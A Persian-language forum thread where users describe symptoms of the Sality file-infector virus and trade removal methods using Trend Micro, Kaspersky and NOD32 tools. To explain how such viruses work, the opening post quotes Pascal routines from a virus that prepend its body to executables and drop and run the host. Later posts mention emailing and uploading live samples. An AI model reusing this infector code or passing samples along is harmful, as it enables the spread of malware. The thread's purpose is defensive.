سلام به همه .
این چند وقت خیلی از بچه ها در مورد این ویروس سوال پرسیدن گفتم بهتره یه پست بهش اختصاص بدیم تا همه بیان و مشکلاتشون رو بیان کنن.
ویروس sality یه Pe Appendه که این روزها خیلی شیوع پیدا کرده.این ویروس خودش رو به صورت یه درایور نصب میکنه(به گفته نود (IpFilterDriver (IP Traffic Filter Driver
تنها چیزی که من دیدم بعد از ویروس گرفتن این سرویس فعال میشه!!) بهمین خاطره که پروسزش رو نمیتونید ببینید تنها چیزی که میبینید اجرای همزمان یا رندوم واره پروسز های NotePad , Cmd , TelNet , Write , RegEdt32 هست!!!
ویروسهایی که خوشون رو به فایلهای exe میچسبونن تا اینجایی که من میدونم TrendMicro بهشون Pe Append میگه. وقتی شما می خواهید فایلی رو که به این ویروس مبتلا شده است رو اجرا کنید این ویروس خودش رو از فایل آلوده جدا و در مسیر های متفاوتی مثل WinDir یا Temp می ندازه (Drop) بعد فایل الوده رو اجرا میکنه طوری که انگار ویروسی در کار نبوده! برای این ویروس در سایتهای مختلف موارد متفاوتی گفته شده :


Tren Micro:

It drops the following files in the Windows system folder:


vcmgcd32.dll - detected by Trend Micro as PE_SALITY.AS-O ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
vcmgcd32.dl_ - compressed version of VCMGCD32.DLL

و


Symantec :


ay drop a .dll file the %System% or %Temp% folders. The following are some examples of the filenames:


SYSLIB32.DLL
OLEDSP32.DLL
SYSDLL.DLL
OLEMDB32.DLL

bitdefender:
Win32.Sality.M is a polymorphic file infector that affects PE executable files. When an infected executable has been run, it drops the following files:

%system%\vcmgcd32.dll
%system%\vcmgcd32.dl_


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدeset:
When executed the virus drops in folder %system%\drivers\ the following file:
%variable%.sys (5941 B)
%variable% stands for a random text.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید برای فهم بهتر موضوع برا بچه های که کمی برنامه نویسی خوندن سورس پاسکال تابع Append و Drop ویروس Virus.Win32.Delf.b که یه pe append است رو در زیر گذاشتم : :27:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


ویروس sality مثل بقیه pe Append ها از این نحوه کد نویسی پیروی میکنه و خودش رو با حجم 56کیلو به exe های سیستم اضافه میکنه.
به گفته trendMicro این ویروس فایلهای

It infects files of the following type(s):


.EXE
.SCR


It avoids folders with the following strings:


AHEAD
SYSTEM

برگرفته از مسیر [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
و Symantec

 May infect executable files by prepending its code to the host file. However, not all the variants of this virus are able to spread in this way. Any infected files will be detected as W32.HLLP.Sality!inf ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]).

 May delete the files which have the following extensions when searching for files to infect:


.vdb
.avc
.key

بر گرفته از مسیر [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
تحت تاثیر قرار میده.
این ویروس به آنتی ویروس اجازه نصب سرویسش رو نمی ده که در نتیجه انتی ویروس نمی
تواند به درستی نصب گردد.

قبلا در راه حل مقابله با این ویروس گفته بودم هاردتون رو جدا کنید و OfficeScan از TrenMicro رو روی یه سیستم دیگه نصب کنید و جستجو کنید....
این ویروس مدل های متفاوتی داره که مدل جدیدش با اپدیت 8.2008 به گفته trendmicro حل میشه.
آقای مهندس الیاس ملکی معاف در مسیر
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اطلاعات جالبی از این ویروس رو قرار داده اند اما بعضی چیزا مثل Autorun و پروسز های گفته شده رو من ندیدم!!
Avg انتی برای Sality انتشار داده که متاسفانه این مدلی که تو بحثمونه رو نمی تونه شناسایی و پاک کنه آخه خودم تست کردم.
اما امروز می خوام یه روش باحال از دوستم TrenMicroبگم.

پاک کردن ویروس Sality ( Remove sality )
روش اول (طولانی و جالب):
به مسیرهای زیر رفته و فایلها را دونلود کرده سپس Extract کنید.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدیه فایل به شکل lptNumber وجود داره که جلوش نوشته مال ویندوزه که number هم نگارش pattern فایلو نشون میده رو بردارید.
لینکه 3 به Pattern spayware اشاره میکنه که فایله ssapiptnNUM.zip (که num نگارش pattern رو نشون میده)رو باید دون کنید بعد از extract فایله ssapiptn.da5 رو SysClean-PE_SALITY\SysClean_PE_SALITY\system\sysclean rvhv nidn.
فایل اول یه برنامه اجرایی عالی از trendMicroست و فایل دوم که Pattern File برنامه اجرایی قبلیست و لیست کلیه ویروسهایی رو داره که تا اکنون توسط trendmicro شناخته شده و راه حل انها ارایه شده است، می باشد.
داخل فایل lptNUMBER.zip فایلی با نام lpt$vpnNUMBER وجود دارد که باید ان را در مسیر
SysClean-PE_SALITY\SysClean_PE_SALITY\system\sysclean
از فایل extract شده اول قرار دهید.
اکنون فایل fix.bat را اجرا کنید تا از قدرت trendMicro آگاه بشید.
اکنون شما در سیستمتون یه آنتی ویروس اپدیت TrendMicroبدون RealTime سرویس دارید.:31:


روش دوم (کوتاه و مختصر):

امروز دیدم که Sality Killer هم کسپر گذاشته.
راستی این لعنتی داره همش نگارش جدید بیرون میده که اگر SalityKiller قدیمی رو داشته باشین نمیتونین باهاش فایلهای خراب شده جدیدتون رو ترمرم کنید.

حتما باید نگارش جدید رو از مسیر زیر بردارید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ه هر حال شما میتونید مستقیما بدون استفاده از TrendMicro و با Sality Killer هم اون از Exe هاتون Clean کنید.] موفق و پیروز باشید.

اینم برای ترمیم رجیستری شما

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

هیچ کس هنوز سالیتی نگرفته!!!!!! D:

هیچ کس هنوز سالیتی نگرفته!!!!!! D: اتفاقا خیلی ها این مشکل رو داشتن و کسی هم نتونست جواب درستی بده

از دقت و حوصله شما خیلی متشکرم که مطالب مفید و دقیق توی این بخش می گذارید

از مدیر این بخش خواهش می کنم که این تاپیک رو بصورت مهم در بیارن یا اینکه یک بخش با عنوان " مقابله با

ویروسهای خاص" ( یا چیزی شبیه به این) اختصاص بدن و توی اون بخش راههای تخصصی برای پاک کردن

ویروسهای خاص مطرح بشه این موضوع رو توی بخش انجمن کاربران فعال هم مطرح می کنم

قربانت عزیز:40:
تو بانک ما (که ازش ن...دارم) این ویروس غوغا کرده!
خصوصا وقتی خودش رو به یه ویروس دیگه مثل کظم غیض و ... می چسبونه و همراه اونا تکثیر میشه.
آخه جالب بود خیلیا این ویروس رو گرفتن خودش نمی دونن اونوقت می رن یه جای اشتباه سوالو مطرح می کنن و چون همه چی رو نمی تونن قشنگ توضیح بدن بچه ها هم گمراه میشن و جواب اشتباه و ....:41:

این تاپیک به چه کسانی می تواند کمک کند، کسانی که:
1- هیچ گونه انتی ویروسی نمی توانند نصب کنن.
2- حجم exe های سیستمشان 56 کیلو اضافه شده است.
3- پروسز های NptePad , Cmd , TelNet , Write , RegEdt32 پشت صحنه به صورت راندوم در حال اجرا می یاشند.
4- کلیدی مثل HKCU\Software\MSH914 در رجیستریشان ایجاد شده که MSH نام کاربر فعلی ویندوز می باشد.
5- سایت کسپر و نودشون و بقیه انتی ها شون بلوکه شده.
6- و مواردی که اقای مهندس الیاسی در ادرس

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ذکر نمودند.
موفق و پیروز باشید.:31:

منم همین مشکلو داشتم عزیزوباروش شما سیستمم راه افتاد ولی نمیدونم چرا فایلهایی که رو هاردم هست همچین اروری میدن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام ویروس کظم غیظ چه کاری میتونه بکنه

به نام خدا
سلام حدمت اساتید
من این مشکل را با nod و آپدیت دوماه پیش حل کردم و جالب این که با چند ورژن مختلف دیگه امتحان کردم نصب نشد
موفق باشید

فکر کنم کمن یه تاپیک در این مورد داشتم! یادم نیست کجاست.

برای سیستم خودم این اتفاق افتاد و تنها راه این بود که ویندوز رو عوش کنم و قبل از هرکاری از روی سیدی یه آنتی ویروس قوی نصب و آپدیت کنم و بعد اسکن.
خیلی جالب بود برای یه سیستم که دیروز اورده بودن پیشم همین مشکل پیش اومده بود و دست بر قضا! (غذا؟ قذا؟ قزا؟ غزا؟ قزا؟ غضا؟) آنتی ویروس هم نداشتم. و مجبور شدم مال خودش رو که کاسپر بود از روی هارد نصب کنم! و دقیقا ویروس هم به فایل اجرایی آنتی ویروس چسبیده بود. 5 بار ویندوز رو نصب کردم. آخرش هم مجبور شدم نورتون رو دانلود و با فلش نصب کنم که خوشبختانه موفق شدم. اما این آنتی ویروس خنگ همه فایل های اجرایی رو پاک کرد.

یه چیز جالب که متوجه شدم اینه که این ویروس قادر به چسبوندن خودش به فایل های اجرایی که پک شده باشن نیست. و دقیقا همین برنامه ها بودن که از اون سیستم باقی موندن.

Enter جان این تا اینجایی که من می دونم او این ویروس رو چندین بار رو چند کامپیوتر متفاوت(کامپیوتر خودم، پسر خوالم دوستموو..)
تستیدم این Error رو ندیدم.
پیشنهاد من نصب یه Windows Installere.
نورتن و نود رو که تستیدم نمی تونن ویروس رو از فایلها Clean کنند.

پیچرجان من قبل ازاینکه سیستمم ویروسی بشه این Error رو ندیده بودم الان اومدم ویندوز رو عوض کردم بازم همین مشکل رو داشت اگه امکانش هست یه تحقیقی کن ببین چیکارباید بکنم دمت گرم.

من فکر می کردم ویروسه خوفیه اما اینجوری که کسی چیزی نمیزاره فهمیدم ویرسه زیادم مالی نیست.

سلام به همه .
این چند وقت خیلی از بچه ها در مورد این ویروس سوال پرسیدن گفتم بهتره یه پست بهش اختصاص بدیم تا همه بیان و مشکلاتشون رو بیان کنن.
ویروس sality یه pe appendه که این روزها خیلی شیوع پیدا کرده.
ویروسهایی که خوشون رو به فایلهای exe میچسبونن تا اینجایی که من میدونم trendmicro بهشون pe append میگه. وقتی شما می خواهید فایلی رو که به این ویروس مبتلا شده است رو اجرا کنید این ویروس خودش رو از فایل آلوده جدا و در مسیر های متفاوتی مثل windir یا temp می ندازه (drop) بعد فایل الوده رو اجرا میکنه طوری که انگار ویروسی در کار نبوده! برای این ویروس در سایتهای مختلف موارد متفاوتی گفته شده :


tren micro:

it drops the following files in the windows system folder:


vcmgcd32.dll - detected by trend micro as pe_sality.as-o ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
vcmgcd32.dl_ - compressed version of vcmgcd32.dll

و


symantec :


ay drop a .dll file the %system% or %temp% folders. The following are some examples of the filenames:


syslib32.dll
oledsp32.dll
sysdll.dll
olemdb32.dll

bitdefender:
Win32.sality.m is a polymorphic file infector that affects pe executable files. When an infected executable has been run, it drops the following files:

%system%\vcmgcd32.dll
%system%\vcmgcd32.dl_


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدeset:
When executed the virus drops in folder %system%\drivers\ the following file:
%variable%.sys (5941 b)
%variable% stands for a random text.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای فهم بهتر موضوع برا بچه های که کمی برنامه نویسی خوندن سورس پاسکال تابع append و drop ویروس virus.win32.delf.b که یه pe append است رو در زیر گذاشتم : :27:

procedure prepend(destinationfilename:string);

var

destinationfile : File;

fileattribute : Integer;

destinationfilesize : Longint;

buf : Ansistring;

begin

try

fileattribute:=getfileattributes(pansichar(destina tionfilename));

setfileattributes(pansichar(destinationfilename), 80);

{$i-}

assignfile(destinationfile,destinationfilename);

filemode:=2;

reset(destinationfile,1);

destinationfilesize:=filesize(destinationfile);

setlength(buf,destinationfilesize);

blockread(destinationfile,buf[1],destinationfilesize);

if pos(virusendsignature,buf)=0 then begin

seek(destinationfile,0);

blockwrite(destinationfile,virusbuffer[1],virussize);

blockwrite(destinationfile,virusendsignature[1],length(virusendsignature));

blockwrite(destinationfile,buf[1],destinationfilesize);

closefile(destinationfile);

end;

{$i+}

setfileattributes(pansichar(destinationfilename), fileattribute);

finally

end;

end;

//----

procedure dropfile;

var

g : File;

s : String;

t : Longint;

begin

{$i-}

t:=viruspositon+length(virusendsignature);

if viruspositon>0 then begin

// working as a classic prepender if can not execute the original file in

// the memory.

if(not isntbasedos)or(not createprocessex(@virusbuffer[t])) then begin

try

s:=temppath+extractfilename(paramstr(0));

assignfile(g,s);

rewrite(g,1);

blockwrite(g,virusbuffer[t],length(virusbuffer)-t+1);

closefile(g);

winexec(pchar(s+' '+commandlineparameters),sw_show);

except

end;

end;

end;

{$i+}

end;
ویروس sality مثل بقیه pe append ها از این نحوه کد نویسی پیروی میکنه و خودش رو با حجم 56کیلو به exe های سیستم اضافه میکنه.
به گفته trendmicro این ویروس فایلهای

it infects files of the following type(s):


.exe
.scr


it avoids folders with the following strings:


ahead
system

برگرفته از مسیر [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
و symantec

 may infect executable files by prepending its code to the host file. However, not all the variants of this virus are able to spread in this way. Any infected files will be detected as w32.hllp.sality!inf ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]).

 may delete the files which have the following extensions when searching for files to infect:


.vdb
.avc
.key

بر گرفته از مسیر [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
تحت تاثیر قرار میده.
این ویروس به آنتی ویروس اجازه نصب سرویسش رو نمی ده که در نتیجه انتی ویروس نمی
تواند به درستی نصب گردد.

قبلا در راه حل مقابله با این ویروس گفته بودم هاردتون رو جدا کنید و officescan از trenmicro رو روی یه سیستم دیگه نصب کنید و جستجو کنید....
این ویروس مدل های متفاوتی داره که مدل جدیدش با اپدیت 8.2008 به گفته trendmicro حل میشه.
آقای مهندس الیاس ملکی معاف در مسیر
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اطلاعات جالبی از این ویروس رو قرار داده اند.
avg انتی برای sality انتشار داده که متاسفانه این مدلی که تو بحثمونه رو نمی تونه شناسایی و پاک کنه آخه خودم تست کردم.
اما امروز می خوام یه روش باحال از دوستم trenmicroبگم.

پاک کردن ویروس sality ( removal sality )
به مسیرهای زیر رفته و فایلها را دونلود کرده سپس extract کنید.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
فایل اول یه برنامه اجرایی عالی از trendmicroست و فایل دوم که pattern file برنامه اجرایی قبلیست و لیست کلیه ویروسهایی رو داره که تا اکنون توسط trendmicro شناخته شده و راه حل انها ارایه شده است، می باشد.
داخل فایل lpt791.zip فایلی با نام lpt$vpn791 وجود دارد که باید ان را در مسیر
sysclean-pe_sality\sysclean_pe_sality\system\sysclean
از فایل extract شده اول قرار دهید.
اکنون فایل fix.bat را اجرا کنید تا از قدرت trendmicro آگاه بشید.
اکنون شما در سیستمتون یه آنتی ویروس اپدیت trendmicroبدون realtime سرویس دارید.:31:
موفق و پیروز باشید.

سلام
مسیر دومتون باز نمیشه ؟!!!

URL][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][/URL
سلام پیجر جان
این آدرس لود نمیشه ؟!!!!

سلام به سایت trend رفتم و از مسیر

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید ویروس پترن فایل و spyware پترن رو گرفتم
همون دو گزینه اول که تو آدرس بالا هست
فقط یه سوال
اول ویروس پترن رو دانلود کردم با حجم 14 مگا به نام lpt811.zip
و اسکن کردم
یه چیزایی پیدا کرد ولی پاک نکرد
بهد به سراغ spyware pattern file رفتم و فایل tma730 رو گرفتم
حالا یه سوال
چطوری میتونم این فایل رو بشناسونم ، طوری که اون پیغام اولیه موقع لود کردن برنامه داده نشه و تو برنامه بتونم spyware ها رو اسکن کنم
مرسی

رو سیستم قبلی منم این ویروسه هنوز هست ،task manager رو میبنده بعلاوه ریجستری

سلام به همه دوستان
همونطوری که آقای پیچر گفته بودند
با trend micro میشه این ویروس رو پاک کرد
من الان سیستم رو با safe mode اوردم بالا
کل سیستم رو چک کردم
و الان با حالت عادی کار می کنم
خبری هم فعلا از autorun نیست
کسایی که اینترنت پرسرعت دارن ، فایل های مورد نظر رو دانلود کنن ، انشاالله مشکلشون حل شه
فقط من یه ویندوز باید عوض کنم ببینم 100% مشکل حل شده یا نه
ولی تا اینجا به راهنمایی های جناب picher تونستم بگیرمش ویروس رو.........

URL][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][/URL
سلام پیجر جان
این آدرس لود نمیشه ؟!!!!

سلام.
عزیز اون لینک مال وقتی بود که نگارش Pattern 791 بود و همیشه نگارش جدید رو میزارن به همین خاطر لینک قدیم کار نمیکنه.
اینم لینک Pattern فایل های جدید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باشید.:31:

ای خدا....
بچه ها اول این تاپیک نوشتم که لطفا هر که هر چی در مورد این ویروس میبینه اینجا بزاره تا اطلاعاتمون رو جامع کنیم...
خواهشا دوباره تاپیک نزنید آخه باعث سردرگمی دیگران میشه...
!!!
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ای خدا....
بچه ها اول این تاپیک نوشتم که لطفا هر که هر چی در مورد این ویروس میبینه اینجا بزاره تا اطلاعاتمون رو جامع کنیم...
خواهشا دوباره تاپیک نزنید آخه باعث سردرگمی دیگران میشه...

سلام دوست من
ممنون هم از تاپیکت و هم از پ.خ
این sality که من دارم دقیقآ همون sality ه ولی کارهایی که میکنه اینه:
سیسیتم بسیار کند میشه
درایوهایی که داری فایل های exe هستن رو حجمشون رو میبره بالا(به خاطر اون 56 کیلویی که میچسبه به فایلهای exe)
از اجرا شدن درست آنتی ویروسها جلوگیری میکنه
SafeMode و Regedit رو غیر فعال میکنه
دسترسی های ادمین رو قطع میکنه

ای خدا....
بچه ها اول این تاپیک نوشتم که لطفا هر که هر چی در مورد این ویروس میبینه اینجا بزاره تا اطلاعاتمون رو جامع کنیم...
خواهشا دوباره تاپیک نزنید آخه باعث سردرگمی دیگران میشه...

سلام دوست من
ممنون هم از تاپیکت و هم از پ.خ
این sality که من دارم دقیقآ همون sality ه ولی کارهایی که میکنه اینه:
سیسیتم بسیار کند میشه
درایوهایی که داری فایل های exe هستن رو حجمشون رو میبره بالا(به خاطر اون 56 کیلویی که میچسبه به فایلهای exe)
از اجرا شدن درست آنتی ویروسها جلوگیری میکنه
SafeMode و Regedit رو غیر فعال میکنه
دسترسی های ادمین رو قطع میکنه
Nod32 فایلهای exe رو به خاطر این ویروس قرنطینه میکنه و اجازه اجرا بهشون میده

سلام.
عزیز این همون سالیتی که من در موردش نوشتم.
این ویروس چندین مدل مختلف داره.
مطمئن باش همین راه حلته.
اگرم نشد روش kasper رو هم آزمایش کن.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باش.

سلام من بالخره نفهمدم کدومشو دان کنماینجا یع عالمه ریخته

هيچ آنتي ويروس جداگانه اي نداره كه بشه باهاش اين ويروس لعنتي رو پاك كرد؟
__________________

واقعآ از آقای picher ممنونم
بالاخره سیستم یه نفس راحت کشید
تمامشون پاک شد حتی kazme_gheyz رو هم پاک کرد الان exe ها رو هم نصب کردم.
خیلی خوشحالم
باز هم از picherممنونم

راستی این آنتی ویروس Nod32 من (قبل از نصب اون آنتی ویروسی که شما معرفی کردین)زمانی که رفتم یکی از این فایلهای exe رو نصب کنم زد اون فایل رو پاک کرد
حالا با RecoveryMyfile هم رفتم پیداش کنم و پیدا نشد.
چی کار میشه کرد اونرو پیدا کرد

سلام.قربونت عزیز.خدا رو شکر که مشکلت حلید.
Zibatarin Name من دقیقا نمیدونم آنتی ها چطوری پاک میکنن.
چند جور پاک کردن داریم : 1- del که میره تو سطل زباله روش 2- Shift Del که آدرسش رو هارد باقی میمونه و قابل recoverie و روش سوم که خفن ترین روشه و برنامه هایی چون PGP Desktop از اونا استفاده میکنن اینجوریه که وقتی فایلی رو پاک میکنن در محل اون روی هارد یه چیزی مینویسن که قابل بازیابی نباشه!!
حالا من واقعا نمی دونم که آنتی ها از کدون روش استفاده میکنن..
اگه توی انجمن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدمطرح کنید حتما یکی جوابتون رو میدونه.
در ضمن
behnam_tr از نظر من که این بهترین انتیه اگر هم باور نداری چند تا پست این تاپیک رو بخونی متوجه میشی.
تو اینترنت که من چیزی پیدا نکردم.ما در خدمتیم.
موفق باشیدو پیروز.

سلام عزیزان

منم این ویروس رو سیستم رفیقم بود وتکثیر شده بود وبا کپی من به هارد من اومد وباعث شد تمتم بازیها ونرم افزارهام از تو پوشه شون پاک بشند البته من اونا رو با انتی ویروس نابود کردم ولی ویندوزم هم نابود شد البته بعد پاک کردن باید ویندوز جدید نصب کنید من اونارو با nod32 پاک کردم بعنوان مثال رو سیستم رفیقم بالا 3000 تکثیر شده بود ولی رو سیستم من حدود 500 و زود عمل کردم

از منم با نود32 نابود شد

و در ضمن بقول شما مگه میشه کسی شیش تا یی ها یادش برد

سلام.
عزیزان ما این تاپیک رو برای این زدیم تا هیچ کس Exe ها و ویندوزش رو از دست نده!!
redstar07 اگه شما پست های این تاپیک رو خوب مطالعه می کردید میدید که نود آنتیه خوبی برای این ویروس نیست و هیچ وقت exe ها تون پاک نمی شد.
موفق و پیروز باشید.

سلام

جناب picher_s توضیحات مفیدی بود، آیا یک نسخه از این ویروس دارین یجا آپلود کنید.
با تشکر

يه آنتي ويروس كم حجم براي از بين بردن ويروس ساليتي :

::::::::::لينك دانلود ::::::


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام

جناب picher_s توضیحات مفیدی بود، آیا یک نسخه از این ویروس دارین یجا آپلود کنید.
با تشکر

سلام
دارم عزیز.
اما برا چی می خواهی؟:46::13:
خیلی خطرناکه ها!!!:31:

يه آنتي ويروس كم حجم براي از بين بردن ويروس ساليتي :

::::::::::لينك دانلود ::::::


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام به همه.
آنتی رو که دوستمون معرفی کردن در پست یک در قسمت انتی ویروس avg معرفی شده بود.اما در اونجا نوشته بودم که در مورد این نگارش ویروس این آنتی ازش کاری برنمیاد!!!:41:
ممنون از پیشنهادتون.
موفق و پیروز باشید.

سلام
دارم عزیز.
اما برا چی می خواهی؟:46::13:
خیلی خطرناکه ها!!!:31:

همینجوری می خواستم:31:
قول میدم زیاد اذیتش نکنم:27:

قول میدم زیاد اذیتش نکنم:27:
سلام رفیق.
امیدوارم خوب باشی.
این کار از لحاظ اخلاقی مثل قتل سیستم میمونه:18:
اگه خواستی دوستت که عاشق کامپیوترشه رو نفرین کنی بهش بگو الهی sality بگیری:21:
خیلیا گرفتن میتونی ازشون بخواهی برات میل بزنن.
ولی اگه بخواهی روش بررسی انجام بدی من برات میفرستم:31:
موفق و پیروز باشی.

سلام رفیق.
امیدوارم خوب باشی.
این کار از لحاظ اخلاقی مثل قتل سیستم میمونه:18:
اگه خواستی دوستت که عاشق کامپیوترشه رو نفرین کنی بهش بگو الهی sality بگیری:21:
خیلیا گرفتن میتونی ازشون بخواهی برات میل بزنن.
ولی اگه بخواهی روش بررسی انجام بدی من برات میفرستم:31:
موفق و پیروز باشی.

سلام دوست من
نه به کسی نمی خوام بدم
خودم یه مدت تنم میخاره که یه ویروس به جون کامپیوترم بیفته:18::31: تا برسیش کنم:46:
موفق باشید

سلام.
پس میلت رو چک کن اونجا برات رو فایل rrt ارسالش کردم عزیز.
موفق و پیروز باشی.

سلام دوستان
منم اين ويروس رو گرفته بودم كه با آپديت نود32 تونستم كلينش كنم . جديدا ويروس ديگه اي شبيه همين ويروس گرفتم كه با آپديت جديد شناسايي مي شه اما نمي تونه كلين كنه اسمش Win32/Virut.NBK هستش كه روي فايلهاي exe و scr ميشينه
لطفا راهي هم واسه كلين كردن اين ويروس بگيد
خيلي ممنون.

سلام دوستان
منم اين ويروس رو گرفته بودم كه با آپديت نود32 تونستم كلينش كنم . جديدا ويروس ديگه اي شبيه همين ويروس گرفتم كه با آپديت جديد شناسايي مي شه اما نمي تونه كلين كنه اسمش win32/virut.nbk هستش كه روي فايلهاي exe و scr ميشينه
لطفا راهي هم واسه كلين كردن اين ويروس بگيد
خيلي ممنون.

سلام
عزیز این ویروسه رو من ندیدم اگه بتونی جایی اپلودش کنی تا اونجایی بتونم کمکت میکنم.
در ضمن راه حل در پست اول این تاپیک رو خوندی و انجام دادی؟

سلام
فايل ويروسي شده رو آپلود كردم

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
pass : 111
لطفا راهي رو واسه clean كردنش بگيد
ممنون.

يه آنتي ويروس كم حجم براي از بين بردن ويروس ساليتي :

::::::::::لينك دانلود ::::::

[

code][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][/code]




با rmsality هم پاک نمیشه
لطفا به من کمک کنید تا پاکش کنم
بد جوری حالمو گرفته

سلام
[USEF8000 لطفا یه جای دیگه Up کن. به اونجا دسترسی ندارم.
KATALONIA شما مطمئنید مراحل گفته شده در پست 1 رو انجام دادید و درست نشد؟

سلام خدمت همه دوستان
من از 3 روز پیش دچار این سالیتی شدم اونم از نوع وحشتناکش که دیگه هیچ کاری نمیتونستم رو سیستم انجام بدم
دسترسی به safe mode بسته شده بود
task manager غیر فعال بود
show hidden کار نمی کرد و همه فایلهای اجرایی آلوده شده بودند

اما بالاخره حلش کردم و مطمئنم که 99 درصد دوستان هم میتونن حلش کنن
اما روش پیشنهادی
1- دانلود این ورژن از نود 32 و نصب اون ( تنها آنتی ویروسی بود که رو سیستم نصب شد، avast , nortonT هیچکدوم نصب نشدند)

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

2- استفاده از REMOVAL SALITY که حدود 10 مگابایته

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---
پس اول نود رو نصب میکنید که سریع ویروسها رو شناسایی میکنه ولی قادر به پاک کردن اونها نیست
در این مرحله فایل win32salityzutility رو اجرا میکنید که ویروس رو غیر فعال میکنه
در مرحله سوم با فعال کردن REAL TIME CLEANING آنتی ویروس یکبار سیستم رو به صورت SMART scan اسکن کنید و
در پایان شاهد پاک شدن تمامی ویروسهای مرتبط با سالیتی خواهید بود
نود برای من حدود 700 فایل اجرایی آلوده رو پیدا و پاکسازی کردو الان ویندوزم از روز اول هم بهتر و پاکیزه تر شده

امیدوارم پست مفیدی برای همه دوستان باشه
موفق باشید

سلام خدمت همه دوستان
من از 3 روز پیش دچار این سالیتی شدم اونم از نوع وحشتناکش که دیگه هیچ کاری نمیتونستم رو سیستم انجام بدم
دسترسی به safe mode بسته شده بود
task manager غیر فعال بود
show hidden کار نمی کرد و همه فایلهای اجرایی آلوده شده بودند

اما بالاخره حلش کردم و مطمئنم که 99 درصد دوستان هم میتونن حلش کنن
اما روش پیشنهادی
1- دانلود این ورژن از نود 32 و نصب اون ( تنها آنتی ویروسی بود که رو سیستم نصب شد، avast , nortonT هیچکدوم نصب نشدند)

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

2- استفاده از REMOVAL SALITY که حدود 10 مگابایته

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---
پس اول نود رو نصب میکنید که سریع ویروسها رو شناسایی میکنه ولی قادر به پاک کردن اونها نیست
در این مرحله فایل win32salityzutility رو اجرا میکنید که ویروس رو غیر فعال میکنه
در مرحله سوم با فعال کردن REAL TIME CLEANING آنتی ویروس یکبار سیستم رو به صورت SMART scan اسکن کنید و
در پایان شاهد پاک شدن تمامی ویروسهای مرتبط با سالیتی خواهید بود
نود برای من حدود 700 فایل اجرایی آلوده رو پیدا و پاکسازی کردو الان ویندوزم از روز اول هم بهتر و پاکیزه تر شده

امیدوارم پست مفیدی برای همه دوستان باشه
موفق باشید

بابا شما با این تاپیک زدنتون بیشتر اعصاب آدمو خورد میکنید تا اینکه کمکش کنید.
از سر صبح نشستم با این اینترنت دیزلی این آنتی ویروسهای که شما لینک دادین رو دانلود میکنم هر کدوم یه اشکالی داره اون از آنتی ویروسهای لینک 1 که اصلا نمیتونه ویروس رو پاک کنه ...اینم از ناد 32 که اصلا Regedit رو اجرا نمیکنه....!!!!
هر کسی از راه میرسه یه لینک میزاره تو تاپیک ...آخرش هم هیچ کدوم هیچ کمکی به آدم نمیکنه...
شما اعصاب آدم رو بیشتر از ویروس خورد میکنید.............!!!!!!!!!!!!!!!!!!!؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟

بابا شما با این تاپیک زدنتون بیشتر اعصاب آدمو خورد میکنید تا اینکه کمکش کنید.
از سر صبح نشستم با این اینترنت دیزلی این آنتی ویروسهای که شما لینک دادین رو دانلود میکنم هر کدوم یه اشکالی داره اون از آنتی ویروسهای لینک 1 که اصلا نمیتونه ویروس رو پاک کنه ...اینم از ناد 32 که اصلا regedit رو اجرا نمیکنه....!!!!
هر کسی از راه میرسه یه لینک میزاره تو تاپیک ...آخرش هم هیچ کدوم هیچ کمکی به آدم نمیکنه...
شما اعصاب آدم رو بیشتر از ویروس خورد میکنید.............!!!!!!!!!!!!!!!!!!!؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟
سلام رفیق.
بابا سخت نگیر خیلیا مشکلشون اینجا حل شد.
خوب بگو مشکل کجاست و چرا اینقدر عصابانی:4: هستی؟
